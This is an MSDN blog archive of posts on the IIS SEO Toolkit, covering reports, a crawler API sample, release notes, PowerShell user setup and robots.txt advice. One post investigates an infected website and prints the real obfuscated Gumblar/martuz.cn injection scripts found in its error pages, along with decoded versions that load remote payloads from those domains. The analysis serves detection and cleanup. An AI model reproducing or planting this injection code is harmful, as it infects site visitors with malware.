Welcome to MSDN Blogs Sign in | Join | Help

In the new version of the IIS SEO Toolkit we added two new reports that are very interesting, both from an SEO perspective as well as from user experience and site organization. These reports are located in the Links category of the reports

Redirects

This report shows a summary of all the redirects that were found while crawling the Web site. The first column (Linking-URL) is the URL that was visited that resulted in redirection to the Linked-URL (second column). The third column (Linking-Status code) specifies what type of redirection happened based on the HTTP status code enumeration. The most common values will be MovedPermanently/Moved which is a 301, or Found/Redirect which is a 302. The last column shows the status code for the final URL so you can easily identify redirects that failed or that redirected to another redirect.

image

Why should you care

This report is interesting because Redirects might affect your Search Engine rankings and make your users have the perception that your site is slower. For more information on Redirects see: Redirects, 301, 302 and IIS SEO Toolkit

 

Link Depth

This is probably one of my favorite reports since it is almost impossible to find this type of information in any other 'easy' way.

The report basically tells you how hard it is for users that land in your home page to get to any of the pages in your site. For example in the image below it shows that it takes 5 clicks for a user to get from the home page of my site to the XGrid.htc component.

image

This is very valuable information because you will be able to understand how deep your Web site is, in my case if you were to walk the entire site and layout its structure in a hierarchical diagram it would basically be 5 levels deep. Remember, you want your site to be shallow so that its easily discoverable and crawled by Search Engines.

Even more interesting you can double click any of the results and see the list of clicks that the user has to make it to get to the page.

image

Note that it shows the URL, the Title of the page as well as the Text of the Link you need to click to get to the Next URL (the one with a smaller index). So as you can see in my case the user needs to go to the home page, click the link with text "XGrid", which takes it to the /XGrid/ url (index 3) which then needs to click the link with text "This is a new...", etc.

Note that as you select the URLs in the list it will highlight in the markup the link that takes you to the next URL.

The data of this report is powered by a new type of query we called Route Query. The reason this is interesting is because you can customize the report to add different filters, or change the start URL, or more.

For example, lets say I want to figure out all the pages that the user can get to when they land in my site in a specific page, say http://www.carlosag.net/Tools/XGrid/editsample.htm:

In the Dashboard view of a Report, select the option 'Query->New Routes Query'. This will open a new Query tab where you can specify the Start URL that you are interested.

image

As you can see this report clearly shows that if a user visits my site and lands on this page they will basically be blocked and only be able to see 8 pages of the entire site. This is a clear example on where a link to the Home page would be beneficial.

 

Other common scenarios that this query infrastructure could be used for is to find ways to direct traffic from your most common pages to your conversion pages, this report will let you figure out how difficult or easy it is to get from any page to your conversion pages

0 Comments
Filed under: , ,

One question that I've been asked several times is: "Is it possible to schedule the IIS SEO Toolkit to run automatically every night?". Other related questions are: "Can I automate the SEO Toolkit so that as part of my build process I'm able to catch regressions on my application?", or "Can I run it automatically after every check-in to my source control system to ensure no links are broken?", etc.

The good news is that the answer is YES!. The bad news is that you have to write a bit of code to be able to make it work. Basically the SEO Toolkit includes a Managed code API to be able to start the analysis just like the User Interface does, and you can call it from any application you want using Managed Code.

In this blog I will show you how to write a simple command application that will start a new analysis against the site provided in the command line argument and process a few queries after finishing.

IIS SEO Crawling APIs

The most important type included is a class called WebCrawler. This class takes care of all the process of driving the analysis. The following image shows this class and some of the related classes that you will need to use for this.

image

The WebCrawler class is initialized through the configuration specified in the CrawlerSettings. The WebCrawler class also contains two methods Start() and Stop() which starts the crawling process in a set of background threads. With the WebCrawler class you can also gain access to the CrawlerReport through the Report property. The CrawlerReport class represents the results (whether completed or in progress) of the crawling process. It has a method called GetUrls() that returns an instance to all the UrlInfo items. A UrlInfo is the most important class that represents a URL that has been downloaded and processed, it has all the metadata such as Title, Description, ContentLength, ContentType, and the set of Violations and Links that it includes.

Developing the Sample

  1. Start Visual Studio.
  2. Select the option "File->New Project"
  3. In the "New Project" dialog select the template "Console Application", enter the name "SEORunner" and press OK.
  4. Using the menu "Project->Add Reference" add a reference to the IIS SEO Toolkit Client assembly "c:\Program Files\Reference Assemblies\Microsoft\IIS\Microsoft.Web.Management.SEO.Client.dll".
  5. Replace the code in the file Program.cs with the code shown below.
  6. Build the Solution
using System;
using System.IO;
using System.Linq;
using System.Net;
using System.Threading;
using Microsoft.Web.Management.SEO.Crawler;

namespace SEORunner {
   
class Program {

       
static void Main(string[] args) {

           
if (args.Length != 1) {
               
Console.WriteLine("Please specify the URL.");
               
return;
           
}

           
// Create a URI class
            Uri startUrl = new Uri(args[0]);

           
// Run the analysis
            CrawlerReport report = RunAnalysis(startUrl);

           
// Run a few queries...
            LogSummary(report);

           
LogStatusCodeSummary(report);

           
LogBrokenLinks(report);
       
}

       
private static CrawlerReport RunAnalysis(Uri startUrl) {
           
CrawlerSettings settings = new CrawlerSettings(startUrl);
           
settings.ExternalLinkCriteria = ExternalLinkCriteria.SameFolderAndDeeper;
           
// Generate a unique name
            settings.Name = startUrl.Host + " " + DateTime.Now.ToString("yy-MM-dd hh-mm-ss");

           
// Use the same directory as the default used by the UI
            string path = Path.Combine(
               
Environment.GetFolderPath(Environment.SpecialFolder.MyDocuments),
                "IIS SEO Reports"
);

           
settings.DirectoryCache = Path.Combine(path, settings.Name);

           
// Create a new crawler and start running
            WebCrawler crawler = new WebCrawler(settings);
           
crawler.Start();

           
Console.WriteLine("Processed - Remaining - Download Size");
           
while (crawler.IsRunning) {
               
Thread.Sleep(1000);
               
Console.WriteLine("{0,9:N0} - {1,9:N0} - {2,9:N2} MB",
                   
crawler.Report.GetUrlCount(),
                   
crawler.RemainingUrls,
                   
crawler.BytesDownloaded / 1048576.0f);
           
}

           
// Save the report
            crawler.Report.Save(path);

           
Console.WriteLine("Crawling complete!!!");

           
return crawler.Report;
       
}

       
private static void LogSummary(CrawlerReport report) {
           
Console.WriteLine();
           
Console.WriteLine("----------------------------");
           
Console.WriteLine(" Overview");
           
Console.WriteLine("----------------------------");
           
Console.WriteLine("Start URL:  {0}", report.Settings.StartUrl);
           
Console.WriteLine("Start Time: {0}", report.Settings.StartTime);
           
Console.WriteLine("End Time:   {0}", report.Settings.EndTime);
           
Console.WriteLine("URLs:       {0}", report.GetUrlCount());
           
Console.WriteLine("Links:      {0}", report.Settings.LinkCount);
           
Console.WriteLine("Violations: {0}", report.Settings.ViolationCount);
       
}

       
private static void LogBrokenLinks(CrawlerReport report) {
           
Console.WriteLine();
           
Console.WriteLine("----------------------------");
           
Console.WriteLine(" Broken links");
           
Console.WriteLine("----------------------------");
           
foreach (var item in from url in report.GetUrls()
                                
where url.StatusCode == HttpStatusCode.NotFound &&
                                      
!url.IsExternal
                                
orderby url.Url.AbsoluteUri ascending
                                
select url) {
               
Console.WriteLine(item.Url.AbsoluteUri);
           
}
       
}

       
private static void LogStatusCodeSummary(CrawlerReport report) {
           
Console.WriteLine();
           
Console.WriteLine("----------------------------");
           
Console.WriteLine(" Status Code summary");
           
Console.WriteLine("----------------------------");
           
foreach (var item in from url in report.GetUrls()
                                
group url by url.StatusCode into g
                                
orderby g.Key
                                
select g) {
               
Console.WriteLine("{0,20} - {1,5:N0}", item.Key, item.Count());
           
}
       
}
   
}
}

 

If you are not using Visual Studio, you can just save the contents above in a file, call it SEORunner.cs and compile it using the command line:

C:\Windows\Microsoft.NET\Framework\v3.5\csc.exe /r:"c:\Program Files\Reference Assemblies\Microsoft\IIS\Microsoft.Web.Management.SEO.Client.dll" /optimize+ SEORunner.cs

 

After that you should be able to run SEORunner.exe and pass the URL of your site as a argument, you will see an output like:

Processed - Remaining - Download Size
       56 -       149 -      0.93 MB
      127 -       160 -      2.26 MB
      185 -       108 -      3.24 MB
      228 -        72 -      4.16 MB
      254 -        48 -      4.98 MB
      277 -        36 -      5.36 MB
      295 -        52 -      6.57 MB
      323 -        25 -      7.53 MB
      340 -         9 -      8.05 MB
      358 -         1 -      8.62 MB
      362 -         0 -      8.81 MB
Crawling complete!!!

----------------------------
 Overview
----------------------------
Start URL:  http://www.carlosag.net/
Start Time: 11/16/2009 12:16:04 AM
End Time:   11/16/2009 12:16:15 AM
URLs:       362
Links:      3463
Violations: 838

----------------------------
 Status Code summary
----------------------------
                  OK -   319
    MovedPermanently -    17
               Found -    23
            NotFound -     2
 InternalServerError -     1

----------------------------
 Broken links
----------------------------
http://www.carlosag.net/downloads/ExcelSamples.zip

 

The most interesting method above is RunAnalysis, it creates a new instance of the CrawlerSettings and specifies the start URL. Note that it also specifies that we should consider internal all the pages that are hosted in the same directory or subdirectories. We also set the a unique name for the report and use the same directory as the IIS SEO UI uses so that opening IIS Manager will show the reports just as if they were generated by it. Then we finally call Start() which will start the number of worker threads specified in the WebCrawler::WorkerCount property. We finally just wait for the WebCrawler to be done by querying the IsRunning property.

The remaining methods just leverage LINQ to perform a few queries to output things like a report aggregating all the URLs processed by Status code and more.

Summary

As you can see the IIS SEO Toolkit crawling APIs allow you to easily write your own application to start the analysis against your Web site which can be easily integrated with the Windows Task Scheduler or your own scripts or build system to easily allow for continuous integration.

Once the report is saved locally it can then be opened using IIS Manager and continue further analysis as with any other report. This sample console application can be scheduled using the Windows Task Scheduler so that it can run every night or at any time. Note that you could also write a few lines of PowerShell to automate it without the need of writing C# code and do that by only command line, but that is left for another post.

0 Comments
Filed under: ,

Today we are announcing the final release of the IIS Search Engine Optimization (SEO) Toolkit v1.0. This version builds upon the Beta 1 and Beta 2 versions and is 100% compatible with those versions so any report you currently have continues to work in the new version. The new version includes a set of bug fixes and new features such as:

  1. Extensibility. In this version we are opening a new set of API's to allow you to develop extensions for the crawling process, including the ability to augment the metadata in the report with your own, extend the set of tasks provided in the Site Analysis and Sitemaps User Interface and more. More on this on a upcoming post.
  2. New Reports. Based on feedback we added a Redirects summary report in the Links section as well as a new Link Depth report that allows you to easily know which pages are the "most hidden pages" in your site, or in other words if a user landed at your sites home page, "how many clicks does he need to do to reach a particular page".
  3. New Routes Query. We added a new type of Query called Routes. This is the underlying data that powers the "Link Depth" report mentioned above, however it is also exposed as a new query type so that you can create your own queries to customize the Start page and any other kind of things, like filtering, grouping, etc.
  4. New option to opt-out from keeping a local cache of files. We added a new switch in the "Advanced Settings" of the New Analysis dialog to disable the option of keeping the files stored locally. This allows you to run a report which runs faster and that consumes a lot less disk space than when keeping the files cached. The only side effect is that you will not be able to get the "Content" tab and the contextual position of the links as well as the Word Analysis feature. Everything else continues to work just as any other report.
  5. HTML Metadata is now stored in the Report. By leveraging the Extensibility mentioned in bullet 1, the HTML parser now stores all the HTML META tags content so that you can later use them to write your own queries, whether to filter, group data or just export it, this gives you a very interesting set of options if you have any metadata like Author, or any custom.
  6. Several Bug Fixes:
    1. Internal URLs linked by External URLs now are also included in the crawling process.
    2. Groupings in queries should be case sensitive
    3. Show contextual information (link position) in Routes
    4. The Duplicate detection logic should only include valid responses (do not include 404 NOT Found, 401, etc)
    5. Canonical URLs should support sub-domains.
    6. Several Accessibility fixes. (High DPI, Truncation in small resolutions, Hotkeys, Keyboard navigation, etc).
    7. Several fixes for Right-To-Left languages. (Layout and UI)
    8. Help shortcuts enabled.
    9. New Context Menus for Copying content
    10. Add link position information for Canonical URLs
    11. Remove x-javascript validation for this release
    12. Robots algorithm should be case sensitive
    13. many more

This version can upgrade both Beta 1 and Beta 2 version so go ahead and try it and PLEASE provide us with feedback and any additional things you would like to see for the next version at the SEO Forum in the IIS Web site.

Click here to install the IIS SEO Toolkit.

1 Comments
Filed under: , ,

Yesterday I presented the session "AMS04: Boost Your Site’s Search Ranking with the IIS Search Engine Optimization Toolkit" at the ASP.NET Connections, it was fun to talk to a few attendees that had several questions around the tool and SEO in general. It is always really interesting learning about all the unique environments and types of applications that are being built and how the SEO Toolkit can help them.

Here are the IIS SEO Toolkit slides that I used.

Here you can find the IIS SEO Toolkit download.

And by far the easiest way to get it installed is using the Microsoft Web Platform Installer.

Please send any question and feedback at IIS SEO Toolkit Forums.

And by the way, stay tuned for the RTW version of IIS SEO Toolkit coming SOON.

0 Comments
Filed under: ,

One of my favorites features in the IIS Search Engine Optimization (SEO) Toolkit is what we called Report Comparison. Report Comparison basically allows you to compare two different versions of the results of crawling the same site to see what changed in between. This is a really convenient way to track not only changes in terms of SEO violations but also to be able to compare any attributes on the pages such as Title, Heading, Description, Links, Violations, etc.

How to access the feature

There are a couple of ways to get to this feature.

1) Use the Compare Reports task. While in the Site Analysis Reports listing you can select two reports by using Ctrl+Click, and if both reports are compatible (e.g. they use the same Start URL) the task "Compare Reports" will be shown. Just clicking on that will get you the comparison.

CompareReportsTask

2) Use the Compare to another report menu item. While in the Dashboard view of a Report you can use the "Report->Compare To Another Report" menu item which will show a dialog where you can either select an existing report or even start a new analysis to compare with.

CompareReportsMenu

Report Comparison Page

In both cases you will get the Report Comparison Page displaying the results as shown in the next image.

CompareResults

The Report Comparison page includes a couple of "sections" with data. At the very top it includes links showing the Name and the Date when the reports were ran. If you click on them it will open the report directly just as if you had used the Site Analysis report listing view.

The next sections shows a lot of interesting built-in data such as:

Total # of URLs This basically shows the total # of URLs found in both versions. When clicking the link you will get the listing of URLs based on the version of the report you choose.
New and Removed These are the number of new URLs that were either added in the new version or removed from the old version.
When clicking the added link you will get the listing of URLs based on the new version of the report and if you click the removed link you will get the listing based on the old URLs.
Changed and Unchanged These are the number of URLs that were modified or not modified. These are calculated by comparing the hashes of the files in both versions.
When clicking the links you will get a query that displays a comparison of both versions of URLs showing their content length. (See below)
Total # of Violations This shows the total # of violations found in both versions.
New in existing pages and Fixed in existing pages These are the number of violations introduced or removed on URLs that exist in both reports.
When clicking the added link you will get the listing of violations based on the new version of the report and if you click the removed link you will get the listing based on the old violations.
Introduced in new pages These are the number of violations introduced on URLs that are found only in the new report.
When clicking the added link you will get the listing of violations based on the new version of the report.
Fixed by page removal These are the number of violations that were removed due to the fact that their URLs were no longer found in the new report.
When clicking the added link you will get the listing of violations based on the old version of the report.
Others There are a number of additional reports which basically compare different attributes in URLs that are found in both reports. They compare things like Time Taken, Content Length, Status Code and # of Links.
When clicking the links you will get the query that displays a comparison of both versions of the reports showing the relevant fields. (See below)

Whenever you click the links you get a query dialog that you can customize just as any Query in the Query builder, where you can Add/Remove columns, add filters, etc.

My favorite one is the "Modified URLs" source when you actually can add filters that compare URLs coming from the two different reports.

QueryDialog

Note that when you double click or "right-click –> Compare Details" any of the rows you get a side-by-side comparison of everything in the URL:

SideBySideDialog

Again, you can use any of the tabs to see side-by-side things like the Content of the pages or the Links both versions have or the violations, or pretty much everything that you can see for just one.

SideBySideDialog2

Finally, you can also right click on the Query dialog and choose "Compare Contents". This will launch whatever File Comparison tool you have configured using the "Edit Feature Settings". In this case I have configured WinDiff.exe which shows something like:

SideBySideContents

Summary

As you can see Report Comparison offers is a powerful feature that allows you to keep track of changes between two different reports. This easily allows you to understand over time how your site has been affected by changes. For Site managers it will allow them to query and maintain a history with all the changes. You can imagine that using an automated build process that runs IIS SEO Toolkit crawling whenever a build is made that keeps the report stored somewhere and potentially annotate it with the build number you could even keep a correlation of changes in code with Web site crawling.

0 Comments
Filed under: , ,

Next week I will be presenting at the ASP.NET Connections event in Las Vegas the following topics:

  1. AMS04: Boost Your Site’s Search Ranking with the IIS Search Engine Optimization Toolkit: Search engines are just robots, and you have to play by their rules if you want to see your site in the top search results. In this session, you will learn how to leverage the IIS Search Engine Optimizer and other tools to improve your Web site for search engine and user traffic. You will leave this session with a set of tips and tricks that will boost the search rank, performance and consistency of your Web site. Tuesday 10:00 am.
  2. AMS10: Developing and Deploying for the Windows Web App Gallery: Come hear how the Microsoft Web Platform fosters a powerful development ecosystem for Web applications, and how the latest wave of IIS extensions enable Web applications to move seamlessly from a development environment to a production datacenter. You will also learn how to package a Web application for the Windows Web App Gallery to make it available to millions of users. Thursday 8:15 am.

I will also be participating in a session called: "Q&A session with Scott Guthrie and the ASP.NET and VWD teams at DevConnections" on Wednesday.

It should be fun. If you are around stop by the Microsoft Web Platform booth where I will be hanging around the rest of the time trying to answer any questions and getting a chance to learn more about how you use IIS or any problems you might be facing.

0 Comments
Filed under:

Today somebody ask in the IIS.net Forums how could they automate the process of adding IIS Manager Users and their Permissions using a script or a command line and I thought it would be useful to post something that hopefully will be easy to find and refer to.

One way they found to do it through configuration however they were not getting the password encrypted.

The first thing that I would like to highlight is that the password is not encrypted, it is actually stored as a hash which means just entering the password in clear text will not work the only way it will work is if  you calculate the same hash our current implementation does.

Having said that manually adding the users is also not a good idea since the IIS Manager functionality is extensible and its storage can be replaced to store the users in SQL Server or any other backend. Our built-in implementation stores them in Administration.config but at any given time someone could have a different provider which means your code will not work either.

So then what is the right way? Well the right way is using existing API’s we surface in Microsoft.Web.Management.dll, in particular Microsoft.Web.Management.Server.ManagementAuthentication and Microsoft.Web.Management.ManagementAuthorization. Using these API’s will make sure that it will call the right provider and pass the correct arguments ensuring that you do not have to implement or know any details about their implementation.

These types are really easy to consume from managed code but it does mean you have to write code for it. However the good news is that through PowerShell this gets as simple as it can possibly get.

So just launch PowerShell (make sure its in elevated as an administrator)

Here is how you add a user and grant him access for Default Web Site:

[System.Reflection.Assembly]::LoadWithPartialName("Microsoft.Web.Management") 
[Microsoft.Web.Management.Server.ManagementAuthentication]::CreateUser("MyUser", "ThePassword")
[Microsoft.Web.Management.Server.ManagementAuthorization]::Grant("MyUser", "Default Web Site", $FALSE)
0 Comments
Filed under: ,

Yesterday we released the Beta 2 version of the IIS Search Engine Optimization (SEO) Toolkit. This version builds upon Beta 1 adding a set of new features and several bug fixes reported through the SEO forum:

  1. Report Comparison. Now you have the ability to compare two reports and track a lot of different metrics that changed in between such as New and Removed URLs, Changed and Unchanged URLs, Violations Fixed and new Violations introduced. You can also compare side-by-side the details as well as the contents to see exactly what changed both in markup, headers, or anywhere. This feature will allow you to easily keep track of changes on your Web site. More on this feature in a future blog.
  2. Authentication Support. Now you can crawl Web sites that have secured content through both Basic and Windows Authentication. This was a feature required to be able to crawl Intranet sites as well as certain staging environments that are protected by credentials.
  3. Extensibility.
    1. Developers can now extend the crawling process by providing custom modules that can parse new content types or add new violations.
    2. Developers can also provide additional set of tasks for the User Interface to expose additional features in the Site Analyzer UI as well as the Sitemaps UI.
  4. Canonical Link Support. The crawler now understands Canonical Links (rel="canonical") and contains a new set of violations to detect 5 common mistakes such as invalid use, incorrect domains, etc. The User Interface has also been extended to leverage this concept, so you can generate queries using the "Canonical URL" field, and the Sitemaps User Interface has been extended to filter in a better way those URLs that are not Canonical. For more information on canonical links see: http://www.bing.com/community/blogs/webmaster/archive/2009/02/12/partnering-to-help-solve-duplicate-content-issues.aspx
  5. Export. Now there are three new menu items to "Export all Violations", "Export all URLs" and "Export all Links". They get saved in a CSV (comma-separated-value) format that can easily be opened with Excel or any other Spreadsheet program (or even notepad). Log Parser is another tool that can be used to issue SQL queries to it.
  6. Open Source Files and Directories. To facilitate the fixing of violations now when you crawl the content locally you will get a context menu to open the file or the directory where it is contained in the pre-configured editor with a single click.
  7. Usability feedback. We did tons of changes in the User interface to try to simplify workflows and discovery of features based on usability feedback we had.
    1. Now we have a Start Menu Program to open the feature directly (IIS Search Engine Optimization (SEO) Toolkit).
    2. New Search Engine Optimization Page. Now all the features are surfaced directly from a single page as well as common tasks and the most recently used content within them so that with a single click you get into what you need.
    3. Query Builder updates, better UI for aggregation, auto-suggest for some fields, and better/cleaner display in general.
    4. Automatically start common tasks as part of a workflow.
    5. Less use of Tabs. We learned users felt uncomfortable getting multiple Tabs opened such as when "drilling-down" from a Violations query to see the details. In this version the "drilling-down" happens on a popup dialog to facilitate navigation and preserve context on where you were before. We also kept the option to open them in Tabs by using the "Open Group in New Query" context menu option for those that actually liked that.
    6. Added a new Violations Tag in the details dialog to facilitate fixing page-by-page from the Details Dialog.
    7. New grouping by start time in the reports page.
    8. Many more…
  8. Many bug fixes such as Fixes for CSS parsing (Comments, URL detection, etc), URL Resolution for relative URLs, Remove noise for violations in redirects, better parsing of CSS styles inside HTML, Fixes for HTML to Text conversion, better handling of storage of cached files, fixed format for dates in sitemaps, better bi-directional rendering and Right-to-Left, etc.
  9. Flag status codes 400-600 as broken links.
  10. Robots now can open the robots.txt file and fixed a couple of processing issues.
  11. Sitemaps has better filtering and handling of canonical URLs
  12. Many more

This version can upgrade Beta 1 version and is fully compatible (i.e. your reports continue to work with the new version) so go ahead and try it and PLEASE provide us with feedback at the SEO Forum in the IIS Web site.

Click here to install the IIS SEO Toolkit.

0 Comments
Filed under: , ,

A lot of sites today have the ability for users to sign in to show them some sort of personalized content, whether its a forum, a news reader, or some e-commerce application. To simplify their users life they usually want to give them the ability to log on from any page of the Site they are currently looking at. Similarly, in an effort to keep a simple navigation for users Web Sites usually generate dynamic links to have a way to go back to the page where they were before visiting the login page, something like: <a href="/login?returnUrl=/currentUrl">Sign in</a>.

If your site has a login page you should definitely consider adding it to the Robots Exclusion list since that is a good example of the things you do not want a search engine crawler to spend their time on. Remember you have a limited amount of time and you really want them to focus on what is important in your site.

Out of curiosity I searched for login.php and login.aspx and found over 14 million login pages… that is a lot of useless content in a search engine.

Another big reason is because having this kind of URL's that vary depending on each page means there will be hundreds of variations that crawlers will need to follow, like /login?returnUrl=page1.htm, /login?returnUrl=page2.htm, etc, so it basically means you just increased the work for the crawler by two-fold. And even worst, in some cases if you are not careful you can easily cause an infinite loop for them when you add the same "login-link" in the actual login page since you get /login?returnUrl=login as the link and then when you click that you get /login?returnUrl=login?returnUrl=login... and so on with an ever changing URL for each page on your site. Note that this is not hypothetical this is actually a real example from a few famous Web sites (which I will not disclose). Of course crawlers will not infinitely crawl your Web site and they are not that silly and will stop after looking at the same resource /login for a few hundred times, but this means you are just reducing the time of them looking at what really matters to your users.

IIS SEO Toolkit

If you use the IIS SEO Toolkit it will detect the condition when the same resource (like login.aspx) is being used too many times (and only varying the Query String) and will give you a violation error like: Resource is used too many times.

 

So how do I fix this?

There are a few fixes, but by far the best thing to do is just add the login page to the Robots Exclusion protocol.

  1. Add the URL to the /robots.txt, you can use the IIS Search Engine Optimization Toolkit to edit the robots file, or just drop a file with something like:
    User-agent: *
    Disallow: /login
  2. Alternatively (or additionally)  you can add a rel attribute with the nofollow value to tell them not to even try. Something like:
    <a href="/login?returnUrl=page" rel="nofollow">Log in</a>
  3. Finally make sure to use the Site Analysis feature in the IIS SEO Toolkit to make sure you don't have this kind of behavior. It will automatically flag a violation when it identifies that the same "page" (with different Query String) has already been visited over 500 times.

Summary

To summarize always add the login page to the robots exclusion protocol file, otherwise you will end up:

  1. sacrificing valuable "search engine crawling time" in your site.
  2. spending unnecessary bandwidth and server resources.
  3. potentially even blocking crawlsers from your content.
1 Comments
Filed under: , ,

The other day a friend of mine who owns a Web site asked me to look at his Web site to see if I could spot anything weird since according to his Web Hosting provider it was being flagged as malware infected by Google.

My friend (who is not technical at all) talked to his Web site designer and mentioned the problem. He downloaded the HTML pages and tried looking for anything suspicious on them, however he was not able to find anything. My friend then went back to his Hosting provider and mentioned the fact that they were not able to find anything problematic and that if it could be something with the server configuration, to which they replied in a sarcastic way that it was probably ignorance on his Web site designer.

Enter IIS SEO Toolkit

So of course I decided the first thing I would do is to start by crawling the Web site using Site Analysis in IIS SEO Toolkit. This gave me a list of the pages and resources that his Web site would have. First thing I knew is usually malware hides either in executables or scripts on the server, so I started looking for the different content types shown in the "Content Types Summary" inside the Content reports in the dashboard page.

img01

I was surprised to no found a single executable and to only see two very simple javascripts which looked not like malware in any way. So based on previous knowledge I knew that malware in HTML pages usually is hidden behind a funky looking script that is encoded and usually uses the eval function to run the code. So I quickly did a query for those HTML pages which contain the word eval and contain the word unescape. I know there are valid scripts that could include those features since they exist for a reason but it was a good way to get scoping the pages.

Gumblar and Martuz.cn Malware on sight

img02

After running the query as shown above, I got a set of HTML files which all gave a status code 404 – NOT FOUND. Double clicking in any of them and looking at the HTML markup content made it immediately obvious they were malware infected, look at the following markup:

<HTML>
<HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD>
<script language=javascript><!-- 
(function(AO9h){var x752='%';var qAxG='va"72"20a"3d"22Scr"69pt"45ng"69ne"22"2cb"3d"22Version("29"2b"22"2c"6a"3d"22"22"2cu"3dnav"69g"61"74or"2e"75ser"41gent"3bif((u"2e"69ndexO"66"28"22Win"22)"3e0)"26"26(u"2eindexOf("22NT"206"22"29"3c0)"26"26(document"2e"63o"6fkie"2ei"6e"64exOf("22mi"65"6b"3d1"22)"3c0)"26"26"28typ"65"6ff"28"7arv"7a"74"73"29"21"3dty"70e"6f"66"28"22A"22))"29"7b"7arvzts"3d"22A"22"3be"76a"6c("22i"66(wi"6edow"2e"22+a"2b"22)j"3d"6a+"22+a+"22Major"22+b+a"2b"22M"69no"72"22"2bb+a+"22"42"75"69ld"22+b+"22"6a"3b"22)"3bdocume"6e"74"2ewrite"28"22"3cs"63"72ipt"20"73rc"3d"2f"2fgum"62la"72"2ecn"2f"72ss"2f"3fid"3d"22+j+"22"3e"3c"5c"2fsc"72ipt"3e"22)"3b"7d';var Fda=unescape(qAxG.replace(AO9h,x752));eval(Fda)})(/"/g);
-->
</script><script language=javascript><!-- 
(function(rSf93){var SKrkj='%';var METKG=unescape(('var~20~61~3d~22S~63~72i~70~74Engine~22~2cb~3d~22Version()+~22~2cj~3d~22~22~2c~75~3dn~61v~69ga~74o~72~2e~75se~72Agen~74~3b~69f(~28u~2eind~65~78~4ff(~22Chro~6d~65~22~29~3c~30)~26~26(~75~2e~69ndexOf(~22Wi~6e~22)~3e0)~26~26(u~2e~69ndexOf(~22~4eT~206~22~29~3c0~29~26~26(doc~75~6dent~2ecook~69e~2ein~64exOf(~22miek~3d1~22)~3c~30)~26~26~28typeof(zrv~7at~73)~21~3dtyp~65~6ff(~22A~22~29))~7bzrv~7at~73~3d~22~41~22~3b~65~76al(~22i~66(w~69ndow~2e~22+a+~22)~6a~3dj+~22+~61+~22M~61jor~22+b~2b~61+~22~4dinor~22+~62+a~2b~22B~75ild~22~2bb+~22j~3b~22)~3bdocu~6d~65n~74~2e~77rit~65(~22~3cs~63r~69pt~20src~3d~2f~2f~6dar~22~2b~22tuz~2ec~6e~2f~76~69d~2f~3f~69d~3d~22+j+~22~3e~3c~5c~2fscr~69pt~3e~22)~3b~7d').replace(rSf93,SKrkj));eval(METKG)})(/\~/g);
 
--></script><BODY>
<H1>Not Found</H1>
The requested document was not found on this server.
<P>
<HR>
<ADDRESS>
Web Server at **********
</ADDRESS>
</BODY>
</HTML>

Notice those two ugly scripts that seem to be just a random set of numbers, quotes and letters? I do not believe I've ever met a developer that writes code like that in real web applications.

For those of you like me that do not particularly enjoy reading encoded Javascript what these two scripts do is just unescape the funky looking string and then execute it. I have un-encoded the script that would get executed and showed it below just to show case how this malware works. Note how they special case a couple browsers including Chrome to request then a particular script that will cause the real damage.

var a = "ScriptEngine", 
   
b = "Version()+", 
   
j = "", 
   
u = navigator.userAgent; 
if ((u.indexOf("Win") > 0) && (u.indexOf("NT 6") < 0) && (document.cookie.indexOf("miek=1") < 0) && (typeof (zrvzts) != typeof ("A"))) { 
   
zrvzts = "A"; 
   
eval("if(window." + a + ")j=j+" + a + "Major" + b + a + "Minor" + b + a + "Build" + b + "j;"); 
   
document.write("<script src=//gumblar.cn/rss/?id=" + j + "><\/script>"); 
}

And:

var a="ScriptEngine",
   
b="Version()+",
   
j="",u=navigator.userAgent;
if((u.indexOf("Chrome")<0)&&(u.indexOf("Win")>0)&&(u.indexOf("NT 6")<0)&&(document.cookie.indexOf("miek=1")<0)&&(typeof(zrvzts)!=typeof("A"))){
   
zrvzts="A";
   
eval("if(window."+a+")j=j+"+a+"Major"+b+a+"Minor"+b+a+"Build"+b+"j;");document.write("<script src=//martuz.cn/vid/?id="+j+"><\/script>");
}

Notice how both of them end up writing the actual malware script living in martuz.cn and gumblar.cn.

Final data

Now, this clearly means they are infected with malware, and it clearly seems that the problem is not in the Web Application but the infection is in the Error Pages that are being served from the Server when an error happens. Next step to be able to guide them with more specifics I needed to determine the Web server that they were using, to do that it is as easy as just inspecting the headers in the IIS SEO Toolkit which displayed something like the ones shown below:

Accept-Ranges: bytes
Content-Length: 2570
Content-Type: text/html
Date: Sat, 20 Jun 2009 01:16:23 GMT
Last-Modified: Sun, 17 May 2009 06:43:38 GMT
Server: Apache/2.2.3 (Debian) mod_jk/1.2.18 PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8

With a big disclaimer that I know nothing about Apache, I then guided them to their .htaccess file and the httpd.conf file for ErrorDocument and that would show them which files were infected and if it was a problem in their application or the server.

Case Closed

Turns out that after they went back to their Hoster with all this evidence, they finally realized that their server was infected and were able to clean up the malware. IIS SEO Toolkit helped me quickly identify this based on the fact that is able to see the Web site with the same eyes as a Search Engine would, following every link and letting me perform easy queries to find information about it. In future versions of IIS SEO Toolkit you can expect to be able to find this kind of things in a lot simpler ways, but for Beta 1 for those who cares here is the query that you can save in an XML file and use "Open Query" to see if you are infected with these malware.

<?xml version="1.0" encoding="utf-8"?>
<query dataSource="urls">
 
<filter>
   
<expression field="ContentTypeNormalized" operator="Equals" value="text/html" />
    <
expression field="FileContents" operator="Contains" value="unescape" />
    <
expression field="FileContents" operator="Contains" value="eval" />
  </
filter>
 
<displayFields>
   
<field name="URL" />
    <
field name="StatusCode" />
    <
field name="Title" />
    <
field name="Description" />
  </
displayFields>
</query>

The other day somebody ask me if there was a way to limit the amount of work that Site Analysis in IIS SEO Toolkit would cause to the server. This is interesting for a couple of reasons,

  • You might want to reduce the load that Site Analysis cause to your server at any given time
  • You might have a Denial-of-service detection system such as our Dynamic IP Restrictions IIS module that will start failing requests based on number of requests in a certain amount of time
  • Or If you like me have to go through a Proxy and it has a configured limit of number of requests per minute you are allowed to issue

In Beta 1 we do not support the Crawl-delay directive in the Robots exclusion protocol; in future versions we will look at adding support this setting. The good news is that in Beta 1 we do have a configurable setting that can help you achieve this goals called Maximum Number of Concurrent Requests that you can configure.

To set it:

  1. Go to the Site Analysis Reports page
  2. Select the option "Edit Feature Settings..." as show in the next image
    EditFeatureSettings
  3. In the "Edit Feature Settings" dialog you will see the Maximum Number of Concurrent Requests option that you can set to any value from 1 to 16. The default value is 8 which means at any given time we will issue 8 requests to the server.
